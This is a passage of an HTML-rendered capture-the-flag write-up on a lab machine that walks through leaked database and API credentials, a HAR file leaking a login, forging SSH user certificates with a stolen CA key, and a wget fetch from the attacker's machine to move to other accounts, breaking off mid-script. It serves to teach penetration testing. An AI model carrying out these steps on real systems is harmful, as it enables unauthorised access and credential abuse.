&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-php" data-lang="php">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">&amp;lt;?&lt;/span>php
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>$dsn &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;mysql:host=db;dbname=resourcecenter;&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>$dbusername &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;jj&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>$dbpassword &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;ugEG5rR5SG8uPd&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>$pdo &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">new&lt;/span> PDO($dsn, $dbusername, $dbpassword);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">try&lt;/span> {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $pdo&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">setAttribute&lt;/span>(PDO&lt;span style="color:#fe8019">::&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">ATTR_ERRMODE&lt;/span>, PDO&lt;span style="color:#fe8019">::&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">ERRMODE_EXCEPTION&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>} &lt;span style="color:#fe8019">catch&lt;/span> (PDOException $e) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">die&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;Connection failed: &amp;#34;&lt;/span> &lt;span style="color:#fe8019">.&lt;/span> $e&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">getMessage&lt;/span>());
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>}
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>But we can&amp;rsquo;t connect to mysql.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809190108.webp" alt="">
Maybe we can ssh directly into the host machine using the credential?
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129193523.webp" alt="">&lt;/p>
&lt;p>&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129193539.webp" alt="">
And that wasn&amp;rsquo;t working either.&lt;/p>
&lt;p>Before moving on I checked the &lt;code>index.php&lt;/code> file to investigate why the &lt;code>phar://&lt;/code> attack worked and why the path traversal didn&amp;rsquo;t:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-php" data-lang="php">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">&amp;lt;?&lt;/span>php session_start();
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> (isset($_GET[&lt;span style="color:#b8bb26">&amp;#34;page&amp;#34;&lt;/span>]) &lt;span style="color:#fe8019">and&lt;/span> file_exists($_GET[&lt;span style="color:#b8bb26">&amp;#34;page&amp;#34;&lt;/span>] &lt;span style="color:#fe8019">.&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;.php&amp;#34;&lt;/span>)){
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $page &lt;span style="color:#fe8019">=&lt;/span> $_GET[&lt;span style="color:#b8bb26">&amp;#34;page&amp;#34;&lt;/span>] &lt;span style="color:#fe8019">.&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;.php&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>} &lt;span style="color:#fe8019">elseif&lt;/span> (isset($_SESSION[&lt;span style="color:#b8bb26">&amp;#34;username&amp;#34;&lt;/span>])) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $page &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;dashboard.php&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>} &lt;span style="color:#fe8019">else&lt;/span> {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $page &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;home.php&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>}
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">require_once&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;header.inc.php&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;lt;div class=&lt;/span>&lt;span style="color:#b8bb26">\&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">main&lt;/span>&lt;span style="color:#b8bb26">\&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">&amp;gt;&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">include_once&lt;/span> $page;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;lt;/div&amp;gt;&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">require_once&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;footer.inc.php&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">?&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>It appends &lt;code>.php&lt;/code> to the value of &lt;code>page&lt;/code> parameter and checks if that file exists in the server using &lt;code>file_exists()&lt;/code> function. That&amp;rsquo;s why we were not able to read &lt;code>/etc/passwd&lt;/code> file before, because even if we add a &lt;code>#&lt;/code> at the end the &lt;code>file_exists(&amp;quot;../../../../etc/passwd#.php&amp;quot;)&lt;/code> check will fail. This is not that secure because we can perform path traversal and include &lt;code>php&lt;/code> files in other folders like &lt;code>../../test.php&lt;/code>. But including &lt;code>php&lt;/code> files already in the server doesn&amp;rsquo;t help us get a shell. Also the server strictly checks the uploaded file is a &lt;code>zip&lt;/code> file. So 0xdf, creator of the challenge chained this with a &lt;code>phar://&lt;/code> deserialization attack. cool&amp;hellip;
After a lot of enumeration I couldn&amp;rsquo;t find anything useful. Then I checked the &lt;code>uploads/&lt;/code> directory and filtered all the &lt;code>zip&lt;/code> files to check if there&amp;rsquo;s anything interesting.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809191048.webp" alt="">&lt;/p>
&lt;p>It&amp;rsquo;s a &lt;a href="https://en.wikipedia.org/wiki/HAR_(file_format)">HAR&lt;/a> file:&lt;/p>
&lt;div
class="alert alert-note "
style="border-color: #076678;"
>
&lt;div
class="alert-heading-box"
>
&lt;i
class="bx bx-info-circle"
style="color: #076678;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #076678"
>
What&amp;rsquo;s a HAR file?
&lt;/p>
&lt;/div>
&lt;div class="alert-content" >
&lt;p>The &lt;strong>HTTP Archive&lt;/strong> format, or &lt;strong>HAR&lt;/strong>, is a JSON-formatted archive file format for logging of a web browser&amp;rsquo;s interaction with a site. The common extension for these files is &lt;strong>.har&lt;/strong>.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;p>Since it logs all the interactions, we can check for leaked login credentials in this file, and we found one
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809191638.webp" alt="">&lt;/p>
&lt;p>It&amp;rsquo;s definitely a user in the machine&lt;/p>
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809191735.webp" alt="">&lt;h2 id="lateral-movement---user-msainristil">Lateral Movement - user msainristil&lt;/h2>
&lt;p>The container is running &lt;code>sshd&lt;/code> so we can try ssh into the user with the password
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809192052.webp" alt="">&lt;/p>
&lt;p>And it works&lt;/p>
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809192137.webp" alt="">&lt;p>There is a &lt;code>decommission_old_ca&lt;/code> directory in the home
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809192355.webp" alt="">
And it&amp;rsquo;s actually a &lt;a href="https://www.lorier.net/docs/ssh-ca.html">Certification Authority key&lt;/a>
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809192513.webp" alt="">&lt;/p>
&lt;h2 id="lateral-movement---user-zzinter">Lateral Movement - user zzinter&lt;/h2>
&lt;p>You can check the website I linked above or the &lt;code>CERTIFICATES&lt;/code> section in the man page of &lt;code>ssh-keygen&lt;/code> to learn more about this.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809195007.webp" alt="">
So basically we can sign ssh keys for the users in the machine using this CA.
Fi./rst we have to copy the private key &lt;code>ca-itrc&lt;/code> to our local machine. Then create an ssh key pair, and sign it using the CA key for the user &lt;code>zzinter&lt;/code> on the machine.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>chmod &lt;span style="color:#d3869b">600&lt;/span> ca-itrc
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ssh-keygen -t rsa -f ctf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ssh-keygen -s ca-itrc -I &lt;span style="color:#b8bb26">&amp;#34;zzinter@itrc user key&amp;#34;&lt;/span> -n &lt;span style="color:#b8bb26">&amp;#34;zzinter&amp;#34;&lt;/span> ./ctf.pub
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;br>
&lt;div
class="alert alert-note collapsed"
style="border-color: #076678;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-info-circle"
style="color: #076678;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #076678"
>
Explantion
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #076678;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>First we create a ssh key pair &lt;br>
&lt;code>-t rsa&lt;/code> is to set the type of the key to &lt;code>rsa&lt;/code>&lt;br>
&lt;code>-f&lt;/code> is to specify the name of the file&lt;br>
Then we sign the public key using the CA certificate&lt;br>
&lt;code>-s&lt;/code> specifies the CA certificate&lt;br>
&lt;code>-I&lt;/code> it should be in the format &lt;code>user@hostname user key&lt;/code>&lt;br>
&lt;code>-n&lt;/code> specifies the username&lt;br>&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;p>It will generate a &lt;code>ctf-cert.pub&lt;/code> file. Now we can copy all the generated files into the &lt;code>decommission_old_ca&lt;/code> directory. We can start a python http server in our machine and use wget to download all the files&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># our machine&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mkdir www
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mv ctf* www &lt;span style="color:#fe8019">&amp;amp;&amp;amp;&lt;/span> &lt;span style="color:#fabd2f">cd&lt;/span> www
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>python3 -m http.server &lt;span style="color:#d3869b">8000&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># htb machine&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>wget http://10.10.10.1:8000/ -r -nd &lt;span style="color:#fe8019">&amp;amp;&amp;amp;&lt;/span> rm index.html
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now we can login to &lt;code>zzinter&lt;/code> using the ssh private key:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ssh zzinter@10.10.11.27 -i ctf -o CertificateFile&lt;span style="color:#fe8019">=&lt;/span>ctf-cert.pub
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809200037.webp" alt="">&lt;hr>
&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;h2 id="local-enumeration-1">Local Enumeration&lt;/h2>
&lt;p>There&amp;rsquo;s a &lt;code>sign_key_api.sh&lt;/code> file in the home
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809200324.webp" alt="">&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">#!/bin/bash
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>usage &lt;span style="color:#fe8019">()&lt;/span> &lt;span style="color:#fe8019">{&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Usage: &lt;/span>$0&lt;span style="color:#b8bb26"> &amp;lt;public_key_file&amp;gt; &amp;lt;username&amp;gt; &amp;lt;principal&amp;gt;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">exit&lt;/span> &lt;span style="color:#d3869b">1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">}&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$#&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -ne &lt;span style="color:#d3869b">3&lt;/span> &lt;span style="color:#fe8019">]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>public_key_file&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$1&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>username&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$2&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>principal_str&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$3&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>supported_principals&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;webserver,analytics,support,security&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>IFS&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;,&amp;#39;&lt;/span> &lt;span style="color:#fabd2f">read&lt;/span> -ra principal &lt;span style="color:#fe8019">&amp;lt;&amp;lt;&amp;lt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$principal_str&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">for&lt;/span> word in &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">${&lt;/span>principal[@]&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>; &lt;span style="color:#fe8019">do&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> ! &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$supported_principals&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> | grep -qw &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$word&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Error: &amp;#39;&lt;/span>$word&lt;span style="color:#b8bb26">&amp;#39; is not a supported principal.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Choose from:&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34; webserver - external web servers - webadmin user&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34; analytics - analytics team databases - analytics user&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34; support - IT support server - support user&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34; security - SOC servers - support user&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">done&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[&lt;/span> ! -f &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$public_key_file&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#fe8019">]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Error: Public key file &amp;#39;&lt;/span>$public_key_file&lt;span style="color:#b8bb26">&amp;#39; not found.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>public_key&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">$(&lt;/span>cat $public_key_file&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>curl -s signserv.ssg.htb/v1/sign -d &lt;span style="color:#b8bb26">&amp;#39;{&amp;#34;pubkey&amp;#34;: &amp;#34;&amp;#39;&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$public_key&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;&amp;#34;, &amp;#34;username&amp;#34;: &amp;#34;&amp;#39;&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$username&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;&amp;#34;, &amp;#34;principals&amp;#34;: &amp;#34;&amp;#39;&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$principal&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;&amp;#34;}&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#34;Content-Type: application/json&amp;#34;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#34;Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>This script calls and api to sign ssh public keys. We can run the script and give it a public key, username, and a principal value (from &lt;code>webserver&lt;/code>, &lt;code>analytics&lt;/code>, &lt;code>support&lt;/code>, and &lt;code>security&lt;/code>). This api might be trying to sign the given public key with a CA certificate present in the host machine. To sign the pubilc key, we have to figure out valid username and principal combination. I first checked user &lt;code>root&lt;/code> and all of he mentioned principals. But none of them worked, then after some more trial and error I found a valid combo &lt;code>support:support&lt;/code>.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ssh-keygen -t rsa -f ctf-support
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># copy the pub file into the htb machine and run the script&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>bash sign_key_api.sh ./ctf-support.pub support support
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>This will generate a &lt;code>cert&lt;/code> file and we can login to ssh using this cert file and the private key. Note that there&amp;rsquo;s to ssh port open &lt;code>22&lt;/code> and &lt;code>2222&lt;/code>. The &lt;code>22&lt;/code> port is for the docker and maybe the &lt;code>2222&lt;/code> is for the host.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ssh support@10.10.11.27 -p &lt;span style="color:#d3869b">2222&lt;/span> -i ctf-support -o CertificateFile&lt;span style="color:#fe8019">=&lt;/span>support.cert
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809202958.webp" alt="">&lt;h2 id="privilege-escalation-vector">Privilege Escalation vector&lt;/h2>
&lt;p>I checked the other users in the machine
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809205216.webp" alt="">
There&amp;rsquo;s a zzinter user in this machine. We can try generating another &lt;code>cert&lt;/code> file using the previous script for this user. I tried all 4 principals mentioned in the script but none of them worked.
We can look inside &lt;code>/etc/ssh&lt;/code> to know how this is configured. I recomend you to check this blog to learn more about CAs and Principals &lt;a href="https://dmuth.medium.com/ssh-at-scale-cas-and-principals-b27edca3a5d">https://dmuth.medium.com/ssh-at-scale-cas-and-principals-b27edca3a5d&lt;/a>
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809205819.webp" alt="">&lt;/p>
&lt;p>root login is enabled in the &lt;code>sshd_config&lt;/code> file. If we check the &lt;code>/etc/ssh/sshd_conf.d/sshcerts.conf&lt;/code> we can see where the principals are stored
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809205926.webp" alt="">&lt;/p>
&lt;p>As we can see there are 2 more principals that were not mentioned in the previous script that used to sign the ssh public key.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809210224.webp" alt="">
Let&amp;rsquo;s copy the previous script, ad these two new principals to the script and try login as root.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129222723.webp" alt="">&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>ssh-keygen -t rsa -f ctf-root
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>bash sign_key_api.sh ./ctf-root.pub root root_user
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129222955.webp" alt="">
We can&amp;rsquo;t sign the key for root user.&lt;/p>
&lt;p>Let&amp;rsquo;s try zzinter&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ssh-keygen -t rsa -f ctf-zzinter
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>bash sign_key_api.sh ./ctf-zzinter.pub zzinter zzinter_temp
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129223252.webp" alt="">
We got an output, and if we tried to log in using this cert file as user zzinter&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ssh zzinter@10.10.11.27 -p &lt;span style="color:#d3869b">2222&lt;/span> -i ctf-zzinter -o CertificateFile&lt;span style="color:#fe8019">=&lt;/span>zzinter.cert
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We logged in as zzinter
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809210913.webp" alt="">&lt;/p>
&lt;p>User zzinter can run &lt;code>/opt/sign_key.sh&lt;/code> with sudo privileges&lt;/p>
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809211043.webp" alt="">&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">#!/bin/bash
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">&lt;/span>
